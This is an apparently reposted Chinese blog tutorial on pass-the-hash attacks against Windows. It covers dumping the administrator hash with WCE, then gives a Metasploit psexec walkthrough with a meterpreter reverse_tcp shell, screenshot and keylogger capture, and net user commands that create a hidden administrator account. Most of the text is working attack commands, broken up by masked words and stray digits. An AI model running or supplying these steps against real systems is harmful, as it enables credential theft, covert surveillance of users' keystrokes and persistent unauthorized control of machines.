WINDOWS下传递管理员账号哈希值***

在metasploit中只要有密码的哈希值就可以***操作系统了不需要明文密码,下面以实验为目的先用工具wce在操作系统上提取管理员密码的哈希值。

下载wcehttp://1230tt.com/download/wce_v1_4beta_x32.zip

在目标服务器上进入目录wce -l获取管理密码哈希值1AA818381E4E281BAAD3B435B51404EE:5F18A8499CDD4F43D89424AD39CE9AF70

在backtrack里面进入metasploit选择windows/smb/psexec模块,选择meterpreter***载荷设置LHOST本地IP和RHOST目标主机IP,设置SMBUser用户名和密码,然后exploit就可以***了

root@bt:~# msfconsole
msf > use windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.116
msf exploit(psexec) > set RHOST 192.168.1.117
msf exploit(psexec) >set SMBUser administrator
msf exploit(psexec) > set SMBPass 1AA818381E4E281BAAD3B435B51404EE:5F18A8499CDD4F43D89424AD39CE9AF71

在meterpreter下可以截图meterpreter > screenshot3可以查看系统信息meterpreter > sysinfo4

可以查看系统进程meterpreter > ps,还可以启用键盘记录,查看系统进程然后监视explore.exe进程启动键盘记录就可以查看键盘记录了。5meterpreter > migrate 2744

meterpreter > run post/windows/capture/keylog_recorder

6

记录键盘以txt文件保存在root目录下,cat文件就可以看到目标主机上的键盘记录了。

进入shell添加用户并提升为administrators管理员用户组。

C:\WINDOWS\system32>net user 4 4 /add
C:\WINDOWS\system32>net localgroup administrators 4 /add

78

原文链接:http://1230tt.com/archives/233.html

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章